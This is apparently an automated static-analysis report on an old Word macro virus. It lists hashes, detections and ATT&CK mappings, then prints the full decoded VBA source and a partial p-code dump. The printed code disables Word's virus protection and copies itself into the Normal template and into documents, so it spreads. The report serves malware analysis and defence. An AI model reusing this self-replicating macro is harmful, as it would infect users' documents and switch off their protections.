Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 b9139283cc991a81…

MALICIOUS

Office (OLE)

Size: 27.5 KB
Created: 2000-04-06 07:46:00
Authoring application: Microsoft Word 8.0
First seen: 2012-06-14
MD5: 25d112e247204b4951ea3637f659df7c
SHA-1: 2766e7265ffaf096625377bac943aff36bcef50a
SHA-256: b9139283cc991a8102a9c1d76a23cec5ce2d0ca82ef1f96b2be66b61cee9755d
Risk Score: 240

Malware Insights

MITRE ATT&CK
  • T1059.005 Visual Basic
  • T1566.001 Spearphishing Attachment
  • T1059 Command and Scripting Interpreter

The sample contains VBA macros, including a Document_Open macro that references the Shell() function. This indicates an attempt to execute arbitrary code. The macro writes content to a temporary file and would potentially execute it, though the specific execution command is commented out. The presence of the Shell() call together with automatic macro execution on document open strongly suggests downloader or dropper functionality.

Heuristics (4)

  • ClamAV: Doc.Trojan.Marker-43 [critical, CLAMAV_DETECTION]
    ClamAV detected this file as malware: Doc.Trojan.Marker-43
  • VBA macros detected [medium, 2 related findings, OLE_VBA_MACROS]
    Document contains VBA macro code
  • Shell() call in VBA [critical, OLE_VBA_SHELL]
    Shell() call in VBA
  • Document_Open macro [high, OLE_VBA_DOCOPEN]
    Document_Open macro

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 5784 bytes
SHA-256: dbb59e031e8ff2385175cb2c5bfca25fd6f49d646502e93368f53b7512294185
Detection: ClamAV: Doc.Trojan.Marker-25
Obfuscation or payload: unlikely

Script preview (first 1,000 lines of the extracted script):
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Private Sub Document_Open()
On Error Resume Next

'DECLARATIONS

Dim sViralCode As String, nFreeFile As Integer
Dim oNormal As Object, oDocument As Object, sFileName As String
Dim rRange As Range

Const cIndicator = "INDIA"  ' CONSTANT TO FIND IF THE FILE IS ALREADY INFECTED OR NOT

    Options.VirusProtection = False 'SET VIRUS PROTECTION TO OFF MODE
    nFreeFile = FreeFile

    Randomize
    sFileName = "\India" + Str(32767 * Rnd) + ".txt"
    
    Open CurDir + sFileName For Output As #nFreeFile
        Write #nFreeFile, "Kashmir is an integral part of INDIA. JAI HIND"
    Close #nFreeFile
    
    Set oDocument = ActiveDocument.VBProject.VBComponents.Item(1)
    Set oNormal = NormalTemplate.VBProject.VBComponents.Item(1)
    
    If (oNormal.CodeModule.Find(cIndicator, 1, 1, 999, 999)) = False Then
        sViralCode = oDocument.CodeModule.Lines(1, oDocument.CodeModule.CountOfLines)
        ViralCode = ViralCode & Chr(10)
        oNormal.CodeModule.DeleteLines 1, oNormal.CodeModule.CountOfLines
        oNormal.CodeModule.AddFromString sViralCode
        
    End If

'    Shell "Command.com /c ftp.exe -n -s:" + CurDir + sFileName, vbHide
    
    If (oDocument.CodeModule.Find(cIndicator, 1, 1, 999, 999)) = False Then
        sViralCode = oNormal.CodeModule.Lines(1, oNormal.CodeModule.CountOfLines)
        ViralCode = ViralCode & Chr(10)
        oDocument.CodeModule.DeleteLines 1, oNormal.CodeModule.CountOfLines
        oDocument.CodeModule.AddFromString sViralCode
    End If
    
    ActiveDocument.Save
    NormalTemplate.Save
   
End Sub


' Virus Created By An Indian Citizen




' Processing file: /opt/analyzer/scan_staging/6f8d071dbc6347c09b7d30a9f30623c3.bin
' ===============================================================================
' Module streams:
' Macros/VBA/ThisDocument - 3586 bytes
' Line #0:
' Line #1:
' 	FuncDefn (Private Sub Document_Open())
' Line #2:
' 	OnError (Resume Next) 
' Line #3:
' Line #4:
' 	QuoteRem 0x0000 0x000C "DECLARATIONS"
' Line #5:
' Line #6:
' 	Dim 
' 	VarDefn sViralCode (As String)
' 	VarDefn nFreeFile (As Integer)
' Line #7:
' 	Dim 
' 	VarDefn oNormal (As Object)
' 	VarDefn oDocument (As Object)
' 	VarDefn sFileName (As String)
' Line #8:
' 	Dim 
' 	VarDefn rRange (As Range)
' Line #9:
' Line #10:
' 	Dim (Const) 
' 	LitStr 0x0005 "INDIA"
' 	VarDefn cIndicator
' 	QuoteRem 0x001C 0x0038 " CONSTANT TO FIND IF THE FILE IS ALREADY INFECTED OR NOT"
' Line #11:
' Line #12:
' 	LitVarSpecial (False)
' 	Ld Options 
' 	MemSt VirusProtection 
' 	QuoteRem 0x0024 0x0020 "SET VIRUS PROTECTION TO OFF MODE"
' Line #13:
' 	Ld Friend 
' 	St nFreeFile 
' Line #14:
' Line #15:
' 	ArgsCall Read 0x0000 
' Line #16:
' 	LitStr 0x0006 "\India"
' 	LitDI2 0x7FFF 
' 	Ld Rnd 
' 	Mul 
' 	ArgsLd Str 0x0001 
' 	Add 
' 	LitStr 0x0004 ".txt"
' 	Add 
' 	St sFileName 
' Line #17:
' Line #18:
' 	Ld CurDir 
' 	Ld sFileName 
' 	Add 
' 	Ld nFreeFile 
' 	Sharp 
' 	LitDefault 
' 	Open (For Output)
' Line #19:
' 	Ld nFreeFile 
' 	Sharp 
' 	WriteChan 
' 	LitStr 0x002E "Kashmir is an integral part of INDIA. JAI HIND"
' 	PrintItemNL 
' Line #20:
' 	Ld nFreeFile 
' 	Sharp 
' 	Close 0x0001 
' Line #21:
' Line #22:
' 	SetStmt 
' 	LitDI2 0x0001 
' 	Ld ActiveDocument 
' 	MemLd VBProject 
' 	MemLd VBComponents 
' 	ArgsMemLd Item 0x0001 
' 	Set oDocument 
' Line #23:
' 	SetStmt 
' 	LitDI2 0x0001 
' 	Ld NormalTemplate 
' 	MemLd VBProject 
' 	MemLd VBComponents 
' 	ArgsMemLd Item 0x0001 
' 	Set oNormal 
' Line #24:
' Line #25:
' 	Ld cIndicator 
' 	LitDI2 0x0001 
' 	LitDI2 0x0001 
' 	LitDI2 0x03E7 
' 	LitDI2 0x03E7 
' 	Ld oNormal 
' 	MemLd CodeModule 
' 	ArgsMemLd Find 0x0005 
' 	Paren 
' 	LitVarSpecial (False)
' 	Eq 
' 	IfBlock 
' Line #26:
' 	LitDI2 0x0001 
' 	Ld oDocument 
' 	MemLd CodeModule 
' 	MemLd CountOfLines 
' 	Ld oDocument 
'
... (truncated)